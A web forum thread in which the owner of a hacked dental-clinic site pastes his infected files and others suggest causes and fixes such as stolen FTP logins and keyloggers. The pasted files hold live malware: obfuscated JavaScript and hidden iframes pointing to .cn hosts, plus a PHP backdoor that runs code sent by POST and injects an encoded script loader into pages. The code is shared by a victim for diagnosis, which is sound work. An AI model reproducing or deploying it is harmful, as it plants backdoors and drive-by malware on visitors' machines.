Another Site Hacked !!!

[vinod_41]

mann.in hacked earlier sometime back voodooindia.com hacked.

see the code content of Index.html and index.php and even subdomain files are injected with suspecious javascript code and iFrame.

I'm removing all files and restoring copies with me.

What to do to prevent this is this something security lack in server this is second site which is having similar code and blocked by google. on same server.

<html>
<head>
<title>Welcome to Dr. Mann Website, please stand by, while we redirect....</title>
<meta http-equiv="refresh" content="5; URL=http://dentalimplantendodontic.mann.in/">

</head><script type="text/javascript">var hPLAmyvsdfELzjhpwQYf = "EOje60EOje105EOje102EOje114EOje97EOje109EOje101EOje32EOje119EOje105EOje100EOje116EOje104EOje61EOje34EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje105EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOje116EOje116EOje112EOje58EOje47EOje47EOje116EOje114EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje101EOje115EOje111EOje117EOje114EOje99EOje101EOje115EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOje101EOje114EOje47EOje105EOje110EOje46EOje99EOje103EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje121EOje108EOje101EOje61EOje34EOje98EOje111EOje114EOje100EOje101EOje114EOje58EOje48EOje112EOje120EOje59EOje32EOje112EOje111EOje115EOje105EOje116EOje105EOje111EOje110EOje58EOje114EOje101EOje108EOje97EOje116EOje105EOje118EOje101EOje59EOje32EOje116EOje111EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje108EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOje48EOje112EOje120EOje59EOje32EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32EOje102EOje105EOje108EOje116EOje101EOje114EOje58EOje112EOje114EOje111EOje103EOje105EOje100EOje58EOje68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOje114EOje97EOje110EOje115EOje102EOje111EOje114EOje109EOje46EOje77EOje105EOje99EOje114EOje111EOje115EOje111EOje102EOje116EOje46EOje65EOje108EOje112EOje104EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOje109EOje111EOje122EOje45EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje34EOje62EOje60EOje47EOje105EOje102EOje114EOje97EOje109EOje101EOje62";var wyAIvMIOvBsdRDeECZxg = hPLAmyvsdfELzjhpwQYf.split("EOje");var EBrElZthpSMlQNtLZBZV = "";for (var DRzVVdaXDXEHYwLKVFrL=1; DRzVVdaXDXEHYwLKVFrL<wyAIvMIOvBsdRDeECZxg.length; DRzVVdaXDXEHYwLKVFrL++){EBrElZthpSMlQNtLZBZV+=String.fromCharCode(wyAIvMIOvBsdRDeECZxg[DRzVVdaXDXEHYwLKVFrL]);}var FmdulWQzUMVHZPWHWyXp = ""+EBrElZthpSMlQNtLZBZV+"";document.write(""+FmdulWQzUMVHZPWHWyXp+"")</script>
<body><iframe src="http://combinebet.cn:8080/index.php" width=166 height=117 style="visibility: hidden"></iframe>
<center>
<br><br><br><br>
<font size="1" face="Verdana">Welcome to<br><b><br>
<br>

</b>

</font>
<b>
<font size="5" face="Verdana">Mann.IN</font></b><font size="1" face="Verdana"><br>
<br><br><br>
<a href="http://dentalimplantendodontic.mann.in/" style="text-decoration: none">Click Here if your browser doesn't 
automatically redirect you within 5 seconds.</a>
<br><br><br><br><br>
<div align="center">Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For HiTech Dentistry</div><br><br>
<a href="http://dentalimplantendodontic.mann.in/" style="text-decoration: none" title="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry"><img src="/images/dentsply-logo.jpg" width="200" height="59" border="0" alt="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry" title="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry" /></a>
<br><br><br><br><br>

<a href="http://dentsply.com" target="_blank">dentsply.com</a> | <a href="http://dentsply-friadent.com" target="_blank">dentsply-friadent.com</a> | <a href="http://maillefer.ch" target="_blank">maillefer.ch</a> | <a href="http://dentsply.co.uk" target="_blank">dentsply.co.uk</a> | <a href="http://caulk.com" target="_blank">caulk.com</a> | <a href="http://dentsply.de" target="_blank">dentsply.de</a>
<br><br><br>
Copyright © 2008, 
<a href="http://dentalimplantendodontic.mann.in/" style="text-decoration: none">Mann Dental Implant Endodontic Centre</a>
<br><font color="#C0C0C0">Site & Hosting: </font> 

<a href="http://www.fastrackcomputing

now see the content of Index.PHP page the the very beginning and at the end, don't know where this code came from. site mann.in is marked is hack site by google.

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB4REN6PSd2YSw3MiwyMGEsM2QsMjIsNTMsNjNyLDY5cCw3NCw0NW4sNjdpbiw2NSwyMiwyYyw2MiwzZCwyMiw1NmVyc2lvbigsMjkrLDIyLDJjaiwzZCwyMiwyMiwyYyw3NSwzZG5hLDc2aWdhdG9yLDJldSw3M2VyQWdlbiw3NCwzYmlmKCwyOHUsMmVpbiw2NGV4T2YsMjgsMjJDLDY4LDcyb20sNjUsMjIpLDNjMCksMjYsMjYodSwyZWluZGV4T2YsMjgsMjJXaW4sMjIpLDNlMCksMjYsMjYoLDc1LDJlaSw2ZWRleCw0ZmYoLDIyTlQsMjA2LDIyLDI5LDNjMCwyOSwyNiwyNihkb2N1bWVudCwyZWMsNmZvLDZiaWUsMmVpbmRleCw0Ziw2NigsMjJtaSw2NWssM2QsMzEsMjIsMjksM2MwKSwyNiwyNigsNzQsNzlwZW9mKHosNzJ2enRzKSwyMSwzZHR5cGVvZigsMjJBLDIyKSkpLDdieiw3Miw3Niw3YXRzLDNkLDIyQSwyMiwzYmV2YWwoLDIyaWYodyw2OW5kb3csMmUsMjIrYSssMjIsMjksNmEsM2QsNmErLDIyKyw2MSssMjJNLDYxLDZhb3IsMjIrLDYyK2ErLDIyLDRkaW5vciwyMissNjIrYSssMjIsNDJ1aWxkLDIyLDJiYissMjIsNmEsM2IsMjIpLDNiZG9jdW1lbnQsMmV3cml0ZSwyOCwyMiwzY3MsNjMsNzJpcHQsMjBzcmMsM2QsMmYsMmZtYXIsMjIrLDIydCw3NXosMmVjbiwyZnZpZCwyZiwzZmlkLDNkLDIyK2orLDIyLDNlLDNjLDVjLDJmcyw2M3JpcHQsM2UsMjIpLDNiLDdkJztldmFsKHVuZXNjYXBlKHhEQ3oucmVwbGFjZSgvLC9nLCclJykpKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script><>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><iframe src="http://combinebet.cn:8080/index.php" width=166 height=117 style="visibility: hidden"></iframe>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>Dental Implant and Cosmetic Clinic</title>

<link href="includes/style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0" class="maintable">
  <tr><td align="center">
<div class="main">
<?php include("includes/menu.php"); ?>

  <table class="content" width="699" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td align="left" valign="top" style="width:256px; padding-top:1px;">
      <div align="left" style="border:1px solid #666666; padding:2px; width:250px">Visit Dr. Mann's  Dental Implant & Endodontic Centre for International quality  treatment aided by DENTSPLY. Dentsply - For HiTech Dentistry
<br />
<div align="center"><a href="http://dentalimplantendodontic.mann.in/" title="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry"><img src="http://mann.in/images/dentsply-logo.jpg" alt="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry" title="Visit Dr. Mann's Dental Implant & Endodontic Centre for International quality treatment aided by DENTSPLY. Dentsply - For Better Dentistry" width="200" border="0" height="59" /></a> <br />
<a href="http://dentsply.com" target="_blank">dentsply.com</a> | <a href="http://dentsply-friadent.com" target="_blank">dentsply-friadent.com</a> | <a href="http://maillefer.ch" target="_blank">maillefer.ch</a> | <a href="http://dentsply.co.uk" target="_blank">dentsply.co.uk</a> | <a href="http://caulk.com" target="_blank">caulk.com</a> | <a href="http://dentsply.de" target="_blank">dentsply.de</a></div>
</div><br />
	  <img src="http://www.namepros.com/images/newsandevents.jpg" width="128" height="13" />
	  <p><span class="newstitle">Mann Dental Implant Endodontic Centre ! - 13/11/2008</span></p>
	  <img src="http://www.namepros.com/images/blogimg.jpg" width="201" height="64" /><br />
	  Dental Implant Endodontic Centre along with Online Dental Resource Centre with the aim of providing specialist treatment and online consultation has been launched in November 2008. 
	  <div style="padding:20px 0px 20px 0px;">
	  <table width="95%" border="0" cellspacing="2" cellpadding="2">
        <tr>
          <td><a href="infants_children.php"><img src="http://www.namepros.com/images/btn_infant.gif" border="0" /></a></td>

      <td><a href="teens.php"><img src="http://www.namepros.com/images/btn_teens.gif" border="0" /></a></td>

    </tr>

        <tr>

          <td><a href="adults.php"><img src="http://www.namepros.com/images/btn_adult.gif" border="0" /></a></td>

      <td><a href="fiftyplus.php"><img src="http://www.namepros.com/images/btn_plus.gif" border="0" /></a></td>

    </tr>

      </table>

	  </div>
<? include("includes/newsletter.php"); ?>
	  </td>

      <td align="left" valign="top" style="width:442px;">

	    <table width="99%" border="0" cellspacing="0" cellpadding="0" style="width:99%;">

        <tr>

          <td style="background-color:#015232; height:156px; width:15px;"> </td>

          <td align="left" valign="top" style="background-color:#015232; height:156px; width:412px;">

		  <div style="float:left; padding:10px 2px 5px 0px;"><img src="http://www.namepros.com/images/welcome.jpg" width="145" height="128" /></div>

		  <div style="padding:10px 0px 5px 0px; color:#FFFFFF">

		  <img src="http://www.namepros.com/images/welcome_to.jpg" width="244" height="36" /><br />

		  We provide specialist treatments in Dental Implants, Root Canal Treatment (RCT), Cosmetic Smile Designing, Crown and Bridge Fixed Prosthesis, Removable Partial and Full Dentures, Laser Tooth Whitening, Light Cured and Self-Cured Composite Fillings, Extractions and

		  <div style="float:right; padding-top:1px;"><a href="about.php" style="color:#FFFFFF">Read More>></a></div>

		  ...</div>		  </td>

          <td style="background-color:#015232; height:156px; width:15px;"> </td>

        </tr>

      </table>

	    <table width="100%" border="0" cellspacing="0" cellpadding="0">

          <tr>

            <td rowspan="3" align="left" valign="top" style="padding:5px;">

			<img src="http://www.namepros.com/images/our_services.jpg" width="96" height="13" />

			  <ul>

			    <li>Dental Implants</li>

                <li> Root Canal Treatment</li>

                <li> Cosmetic Smile Designing</li>

                <li> Crown and Bridge Fixed Prosthesis</li>

                <li> Removable Partial and Full Dentures</li>

                <li> Laser Tooth Whitening</li>

                <li> Light Cured & Self Cured Composite Fillings</li>

                <li> Extractions</li>

                <li> Minor Surgeries </li>

              </ul></td>

            <td align="left" valign="top"></td>

          </tr>

          <tr>

            <td align="center" valign="top" style="padding-top:5px;"><a href="gallery.php"><img src="http://www.namepros.com/images/gallery.jpg" alt="Gallery" width="201" height="64" border="0" /></a></td>

          </tr>

          <tr>

            <td align="left" valign="top" style="padding:5px; vertical-align:top;">

			  <p><span style="padding:5px;">
              <img src="http://www.namepros.com/images/dental_blo.jpg" width="86" height="16" /></span>			</p>

			         

			    <?
		include "vinod.php";	
		// Create RSS object
		$rss = new lastRSS;
		$rss->cache_dir = 'temp';
		$rss->cache_time = 10;
		$rss->cp = 'US-ASCII';
                $rss->items_limit = 5;
		$rss->date_format = 'l';
		//passing the rss URL
		if ($rs = 
$rss->get("http://mann.in/blog/?feed=rss2")) {
			//going through each item
			foreach($rs['items'] as $item)
			{
				//title
				echo("<a style='text-decoration: none;color:#000000' href='".$item['link']."' 
target='_blank'>".$item['title']."</a>");
				//description
				//echo("<font size='1' color='gray'>".$item['description']."</font>");
				echo("<br>");
			}
		}
		//adding the copyright statement
		$news .= "<small><i>".$rs['copyright']."</i></small>";
	
echo "";
?>	

			    </td>

          </tr>

        </table>	    

	    </td>

    </tr>

    <tr>

      <td colspan="2" align="left" valign="top">

	 <?php echo ''; ?><?php echo '<script type="text/javascript">var hPLAmyvsdfELzjhpwQYf = "EOje60EOje105EOje102EOje114EOje97EOje109EOje101EOje32EOje119EOje105EOje100EOje116EOje104EOje61EOje34EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje105EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOje116EOje116EOje112EOje58EOje47EOje47EOje116EOje114EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje101EOje115EOje111EOje117EOje114EOje99EOje101EOje115EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOje101EOje114EOje47EOje105EOje110EOje46EOje99EOje103EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje121EOje108EOje101EOje61EOje34EOje98EOje111EOje114EOje100EOje101EOje114EOje58EOje48EOje112EOje120EOje59EOje32EOje112EOje111EOje115EOje105EOje116EOje105EOje111EOje110EOje58EOje114EOje101EOje108EOje97EOje116EOje105EOje118EOje101EOje59EOje32EOje116EOje111EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje108EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOje48EOje112EOje120EOje59EOje32EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32EOje102EOje105EOje108EOje116EOje101EOje114EOje58EOje112EOje114EOje111EOje103EOje105EOje100EOje58EOje68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOje114EOje97EOje110EOje115EOje102EOje111EOje114EOje109EOje46EOje77EOje105EOje99EOje114EOje111EOje115EOje111EOje102EOje116EOje46EOje65EOje108EOje112EOje104EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOje109EOje111EOje122EOje45EOje111EO

 

[finehost.in]

Are you using any CMS software for the sites or are these coded by yourself? If it is CMS, someone is smart enough to break-in when you have not updated required patches. I have seen similar attacks on popular CMS based sites.
Do you have access to raw logs / site analytics? Analyze where are the h*** coming from and what is the process, how do they gain access to site / pages / server...

For now, before you restore, I suggest first to figure out how to prevent it in future, and until then, keep "site under maintenance" notice for the moment.

If server is not reliable - change them!!!

 

[vinod_41]

Hello,

No there is no cms, static HTML page and in subdomain its php page. which is also static just using include file function to manage menus header/footer.

 

[enlytend]

What are the permissions on your files/directories? If this is a shared server, it could be some other account on the server compromising your files. Make sure they're not writeable by anyone but the file/directory owner.

Get the raw logs and try to determine where this is coming from. If there's nothing in the web logs, it's definitely someone else with access to the server.

I'd serioualy recommend changing hosts!

 

[nielsencl]

I spent all day yesterday working on sites that were affected by this. Some of the iframe code above matches the same things I was finding on about 65 of my clients sites.

It seems as though hackers have been collecting FTP account logins and then used a worm or virus to use the information to log into sites and look for any index.xxxx pages and add the code for iframes or other things. Then if people hit the infected page they are sent a couple of places and may wind up being infected with other things that adds them to a botnet.

The sites that were infected were ones that the client's staff had ftp access to. None of my personal sites were affected, even those they share about 4-5 different hosting accounts. The pages were modified using valid FTP accounts.

Most of our sites DO NOT use a CMS or have any scripting that could have been used. I checked one site ftp log and found there had been access from Romania...!

If you check your sites and see a blank sopt at the top or bottom, or if the page starts taking a long time to load, then it may be infected. Best to use FTP and check your index files for "iframe" that you don't expect to see there. It may be just after the <body> tag, or at the end of the file. The virus is poorly written so it often erases part of the end of the page, removing the /body and /html tags.

First thing to do is change your FTP passwords, then run a scan on your computer. I hear that malwarebytes free version can find this if your PC is infected, but run serveral different ones to make sure your clean if you are having problems.

 

[SeanPreston]

Another Indian Hacker group. There no end to them.

Good luck on getting things back to normal.
Sean

 

[CrazyTech]

Agreed, if they are accessing FTP, you can bet that they have a keylogger on one or more computers. Make sure all of the affected clients scan their computers (or any that they use), as otherwise it will just happen again when they change passwords. I cannot underscore that enough. I've seen too many folks that don't understand that part.

 

[nielsencl]

Another Indian Hacker group. There no end to them.

First I heard it involved anyone in India, not that it couldn't be. But like I said, the system responsible for FTPing the files to one of our sites was located in Romania. One news source said it was from Ukraine.

 

[turnhardtoeasy]

Thaz a new News to me being an Indian...
Are there Indian hacker groups that Hack websites too

 

[HappyDay]

There are hacker groups worldwide.
Maybe check this also:
combinebet.cn | Web Safety Ratings from McAfee SiteAdvisor
The "readme.pdf contains embedded malicious JavaScript".

 

[jackio]

Nowadays you have many ways to get infected. Lot's of unpatched known holes in the wild, for example Adobe PDF Reader, Quicktime, DirectX... All of this could be used to spread malware/virus and gain access to whatever.

 

[SeanPreston]

Nowadays you have many ways to get infected. Lot's of unpatched known holes in the wild, for example Adobe PDF Reader, Quicktime, DirectX... All of this could be used to spread malware/virus and gain access to whatever.

Totally agree, There are that many largely used free applications that we "trust", image if a staff member at a company like FireFox installed a un-detectable virus within there application, the consequences would be terrible as most, especially within the web industry where people are accessing places where others shouldn't, most of them use FireFox.

I wonder how company's like FireFox keep there application and ensure that none of there staff are doing anything they shouldn't be, look at Microsoft, the many little funny bits of code there is in Windows XP, set by developers without others knowing until release.

Sean

 

[vinod_41]

hello,

I've restored, and added site in google webmasters and submitted for review. (There it is also displaying malware infection notice)

In a day site is back online.


---

well as per my knowledge client is not accessing ftp even a single time since site is online. nor even I or any other guy logged in. I'm using NOD antivirus and I guess there is no key logger.

This is 5th site i'm viewing in my life time with this kind of problem and NONE of them is my personal site.2 were of my clients. 3 of them were someone else.

-----

directories / file permissions they are default 755 / 644

 

[SeanPreston]

The best idea is to contact your server provider or host provider.

If your on a dedicated server then move to a managed services such as WaveWeb, they helped me when I was hacked a few months ago.

Sean